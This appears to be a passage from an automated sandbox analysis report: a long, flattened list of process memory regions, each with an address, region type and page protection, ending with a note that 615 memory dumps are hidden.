page read and write
|
||
|
215F43D8000
|
heap
|
page read and write
|
||
|
7FFC94B50000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4432000
|
heap
|
page read and write
|
||
|
22957410000
|
heap
|
page read and write
|
||
|
7FFC94DE0000
|
trusted library allocation
|
page read and write
|
||
|
215F4431000
|
heap
|
page read and write
|
||
|
E76D78E000
|
stack
|
page read and write
|
||
|
7FFC94AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D20000
|
trusted library allocation
|
page read and write
|
||
|
16F748B0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA442B000
|
heap
|
page read and write
|
||
|
16F72E7C000
|
heap
|
page read and write
|
||
|
20DF2DA6000
|
heap
|
page read and write
|
||
|
7FFC94E84000
|
trusted library allocation
|
page read and write
|
||
|
12EDC160000
|
heap
|
page read and write
|
||
|
7FFC94D80000
|
trusted library allocation
|
page read and write
|
||
|
20DF2AF0000
|
heap
|
page execute and read and write
|
||
|
7FFC94D80000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94EF0000
|
trusted library allocation
|
page read and write
|
||
|
17776591000
|
heap
|
page read and write
|
||
|
7FFC94EEB000
|
trusted library allocation
|
page read and write
|
||
|
20DF2D51000
|
heap
|
page read and write
|
||
|
16F752F1000
|
heap
|
page read and write
|
||
|
7FFC94DA0000
|
trusted library allocation
|
page read and write
|
||
|
215F446D000
|
heap
|
page read and write
|
||
|
7FFCFB0F0000
|
unkown
|
page read and write
|
||
|
7FF76E657000
|
unkown
|
page read and write
|
||
|
16F751B2000
|
heap
|
page read and write
|
||
|
1FCA444E000
|
heap
|
page read and write
|
||
|
1777651F000
|
heap
|
page read and write
|
||
|
7FFC94AE0000
|
trusted library allocation
|
page read and write
|
||
|
16F72C50000
|
heap
|
page read and write
|
||
|
7FFCFB0E6000
|
unkown
|
page readonly
|
||
|
20DF2AB3000
|
heap
|
page read and write
|
||
|
7FF76E657000
|
unkown
|
page write copy
|
||
|
689BC78000
|
stack
|
page read and write
|
||
|
16F74F3B000
|
heap
|
page read and write
|
||
|
12EDBFB0000
|
heap
|
page read and write
|
||
|
E76C3FD000
|
stack
|
page read and write
|
||
|
20D82B38000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D70000
|
trusted library allocation
|
page read and write
|
||
|
16F00496000
|
trusted library allocation
|
page read and write
|
||
|
2295765E000
|
heap
|
page read and write
|
||
|
1FCA444D000
|
heap
|
page read and write
|
||
|
177765AF000
|
heap
|
page read and write
|
||
|
1FCA443C000
|
heap
|
page read and write
|
||
|
7FFC94CA7000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D90000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4432000
|
heap
|
page read and write
|
||
|
12EDC0F0000
|
heap
|
page read and write
|
||
|
689B53D000
|
stack
|
page read and write
|
||
|
7FFC94C87000
|
trusted library allocation
|
page read and write
|
||
|
2295762B000
|
heap
|
page read and write
|
||
|
7FF76E651000
|
unkown
|
page execute read
|
||
|
215F4393000
|
heap
|
page read and write
|
||
|
215F42A0000
|
heap
|
page read and write
|
||
|
12EDC445000
|
heap
|
page read and write
|
||
|
16F74C16000
|
heap
|
page read and write
|
||
|
16F75235000
|
heap
|
page read and write
|
||
|
16F02B25000
|
trusted library allocation
|
page read and write
|
||
|
16F72EC4000
|
heap
|
page read and write
|
||
|
1FCA4432000
|
heap
|
page read and write
|
||
|
C4CD7FC000
|
stack
|
page read and write
|
||
|
7FFC94B1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F02B7C000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4459000
|
heap
|
page read and write
|
||
|
22A3F3A0000
|
heap
|
page read and write
|
||
|
22A3F3A5000
|
heap
|
page read and write
|
||
|
16F74E40000
|
heap
|
page execute and read and write
|
||
|
7FFC94C60000
|
trusted library allocation
|
page read and write
|
||
|
689CF8E000
|
stack
|
page read and write
|
||
|
16F02B09000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4448000
|
heap
|
page read and write
|
||
|
7FFCFB0F0000
|
unkown
|
page read and write
|
||
|
20D813A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFCFB0F5000
|
unkown
|
page readonly
|
||
|
1FCA43F9000
|
heap
|
page read and write
|
||
|
7FFC94C85000
|
trusted library allocation
|
page read and write
|
||
|
16F02B23000
|
trusted library allocation
|
page read and write
|
||
|
16F00235000
|
trusted library allocation
|
page read and write
|
||
|
20DF3083000
|
heap
|
page read and write
|
||
|
7FFC94BC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F02B16000
|
trusted library allocation
|
page read and write
|
||
|
20D80E95000
|
trusted library allocation
|
page read and write
|
||
|
22957657000
|
heap
|
page read and write
|
||
|
7FFC94AC2000
|
trusted library allocation
|
page read and write
|
||
|
7FF76E650000
|
unkown
|
page readonly
|
||
|
20DF2800000
|
heap
|
page read and write
|
||
|
7FFCFB0F0000
|
unkown
|
page read and write
|
||
|
7FFC94D70000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94AC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94AA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FCA4705000
|
heap
|
page read and write
|
||
|
7FFC94F20000
|
trusted library allocation
|
page read and write
|
||
|
20D8214C000
|
trusted library allocation
|
page read and write
|
||
|
689B5FE000
|
stack
|
page read and write
|
||
|
7FFC94CA2000
|
trusted library allocation
|
page read and write
|
||
|
689BDFE000
|
stack
|
page read and write
|
||
|
22957730000
|
heap
|
page read and write
|
||
|
20DF0A54000
|
heap
|
page read and write
|
||
|
7FFC94D50000
|
trusted library allocation
|
page read and write
|
||
|
7FFCFB0D1000
|
unkown
|
page execute read
|
||
|
689BE7C000
|
stack
|
page read and write
|
||
|
1FCA4330000
|
heap
|
page read and write
|
||
|
20DF2816000
|
heap
|
page read and write
|
||
|
7FFC94F40000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94F40000
|
trusted library allocation
|
page read and write
|
||
|
20DF0920000
|
heap
|
page read and write
|
||
|
16F752DE000
|
heap
|
page read and write
|
||
|
20D82B1D000
|
trusted library allocation
|
page read and write
|
||
|
7FF76E659000
|
unkown
|
page readonly
|
||
|
20DF07D0000
|
heap
|
page read and write
|
||
|
17776502000
|
heap
|
page read and write
|
||
|
689BA7D000
|
stack
|
page read and write
|
||
|
215F4471000
|
heap
|
page read and write
|
||
|
215F445D000
|
heap
|
page read and write
|
||
|
20DF2D7B000
|
heap
|
page read and write
|
||
|
16F74830000
|
heap
|
page readonly
|
||
|
7FFC94C5A000
|
trusted library allocation
|
page read and write
|
||
|
1FCA42C0000
|
heap
|
page read and write
|
||
|
16F0174F000
|
trusted library allocation
|
page read and write
|
||
|
E76DA0E000
|
stack
|
page read and write
|
||
|
16F02B32000
|
trusted library allocation
|
page read and write
|
||
|
215F450C000
|
heap
|
page read and write
|
||
|
7FFCFB0F5000
|
unkown
|
page readonly
|
||
|
20D902EE000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94CE0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4432000
|
heap
|
page read and write
|
||
|
16F748C0000
|
heap
|
page read and write
|
||
|
7FFC94DF0000
|
trusted library allocation
|
page read and write
|
||
|
20DF0A0C000
|
heap
|
page read and write
|
||
|
689CF4D000
|
stack
|
page read and write
|
||
|
7FFC94DD0000
|
trusted library allocation
|
page read and write
|
||
|
215F4505000
|
heap
|
page read and write
|
||
|
E76D80E000
|
stack
|
page read and write
|
||
|
16F72E88000
|
heap
|
page read and write
|
||
|
20D82C66000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94AC0000
|
trusted library allocation
|
page read and write
|
||
|
215F4410000
|
heap
|
page read and write
|
||
|
22957600000
|
heap
|
page read and write
|
||
|
177765BC000
|
heap
|
page read and write
|
||
|
20D82C61000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94CF0000
|
trusted library allocation
|
page read and write
|
||
|
22957642000
|
heap
|
page read and write
|
||
|
20DF2380000
|
trusted library allocation
|
page read and write
|
||
|
16F754C3000
|
heap
|
page read and write
|
||
|
1FCA45C0000
|
heap
|
page read and write
|
||
|
20D82B30000
|
trusted library allocation
|
page read and write
|
||
|
16F02B36000
|
trusted library allocation
|
page read and write
|
||
|
2295764E000
|
heap
|
page read and write
|
||
|
20DF0A11000
|
heap
|
page read and write
|
||
|
16F752C8000
|
heap
|
page read and write
|
||
|
20DF2CDA000
|
heap
|
page read and write
|
||
|
16F747B0000
|
heap
|
page read and write
|
||
|
7FFCFB0E6000
|
unkown
|
page readonly
|
||
|
22957607000
|
heap
|
page read and write
|
||
|
215F443D000
|
heap
|
page read and write
|
||
|
7FF76E657000
|
unkown
|
page read and write
|
||
|
22957624000
|
heap
|
page read and write
|
||
|
22957634000
|
heap
|
page read and write
|
||
|
689BAFD000
|
stack
|
page read and write
|
||
|
20DF2B56000
|
heap
|
page read and write
|
||
|
7FFC94E33000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94E10000
|
trusted library allocation
|
page read and write
|
||
|
16F72F95000
|
heap
|
page read and write
|
||
|
177765A3000
|
heap
|
page read and write
|
||
|
20DF2B50000
|
heap
|
page read and write
|
||
|
6E6BEFE000
|
stack
|
page read and write
|
||
|
7FFC94AFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
20DF2CE5000
|
heap
|
page read and write
|
||
|
16F02B3E000
|
trusted library allocation
|
page read and write
|
||
|
689D10D000
|
stack
|
page read and write
|
||
|
1777654B000
|
heap
|
page read and write
|
||
|
16F74EAC000
|
heap
|
page read and write
|
||
|
E76C5F9000
|
stack
|
page read and write
|
||
|
7FF76E650000
|
unkown
|
page readonly
|
||
|
E76C677000
|
stack
|
page read and write
|
||
|
7FFC94CD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D00000
|
trusted library allocation
|
page read and write
|
||
|
20DF09D0000
|
heap
|
page read and write
|
||
|
20D90011000
|
trusted library allocation
|
page read and write
|
||
|
7FF76E651000
|
unkown
|
page execute read
|
||
|
1FCA442B000
|
heap
|
page read and write
|
||
|
2295765E000
|
heap
|
page read and write
|
||
|
20DF0B50000
|
heap
|
page read and write
|
||
|
20D80491000
|
trusted library allocation
|
page read and write
|
||
|
20DF2C30000
|
heap
|
page execute and read and write
|
||
|
16F751BF000
|
heap
|
page read and write
|
||
|
1FCA4447000
|
heap
|
page read and write
|
||
|
12EDC1EC000
|
heap
|
page read and write
|
||
|
16F02B38000
|
trusted library allocation
|
page read and write
|
||
|
20DF2DD5000
|
heap
|
page read and write
|
||
|
177765E0000
|
heap
|
page read and write
|
||
|
689BBFE000
|
stack
|
page read and write
|
||
|
7DF4501C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F10011000
|
trusted library allocation
|
page read and write
|
||
|
16F00E9A000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4411000
|
heap
|
page read and write
|
||
|
16F748C5000
|
heap
|
page read and write
|
||
|
20D803CB000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4422000
|
heap
|
page read and write
|
||
|
7FFC94E00000
|
trusted library allocation
|
page read and write
|
||
|
20D81375000
|
trusted library allocation
|
page read and write
|
||
|
20DF3644000
|
heap
|
page read and write
|
||
|
7FFCFB0D1000
|
unkown
|
page execute read
|
||
|
CFECEFE000
|
stack
|
page read and write
|
||
|
7FFCFB0F5000
|
unkown
|
page readonly
|
||
|
16F74840000
|
trusted library allocation
|
page read and write
|
||
|
6E6C17F000
|
stack
|
page read and write
|
||
|
E76C57D000
|
stack
|
page read and write
|
||
|
7FFC94C82000
|
trusted library allocation
|
page read and write
|
||
|
689BB79000
|
stack
|
page read and write
|
||
|
E76C779000
|
stack
|
page read and write
|
||
|
12EDBFC0000
|
unclassified section
|
page readonly
|
||
|
20DF0A56000
|
heap
|
page read and write
|
||
|
20DF29F0000
|
heap
|
page read and write
|
||
|
1FCA444D000
|
heap
|
page read and write
|
||
|
16F7519C000
|
heap
|
page read and write
|
||
|
12EDC1E0000
|
heap
|
page read and write
|
||
|
7FF76E659000
|
unkown
|
page readonly
|
||
|
689C0FD000
|
stack
|
page read and write
|
||
|
20D82CC7000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94BA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
22957630000
|
heap
|
page read and write
|
||
|
E76C2FE000
|
stack
|
page read and write
|
||
|
20DF0A19000
|
heap
|
page read and write
|
||
|
7FF76E659000
|
unkown
|
page readonly
|
||
|
20DF2A16000
|
heap
|
page read and write
|
||
|
7FFC94E20000
|
trusted library allocation
|
page read and write
|
||
|
20DF2DC0000
|
heap
|
page read and write
|
||
|
1FCA4459000
|
heap
|
page read and write
|
||
|
16F02CD2000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D40000
|
trusted library allocation
|
page read and write
|
||
|
16F02B1C000
|
trusted library allocation
|
page read and write
|
||
|
20D813C8000
|
trusted library allocation
|
page read and write
|
||
|
20DF0A17000
|
heap
|
page read and write
|
||
|
CFED07F000
|
stack
|
page read and write
|
||
|
20D82B32000
|
trusted library allocation
|
page read and write
|
||
|
16F74F00000
|
heap
|
page read and write
|
There are 615 hidden memdumps, click here to show them.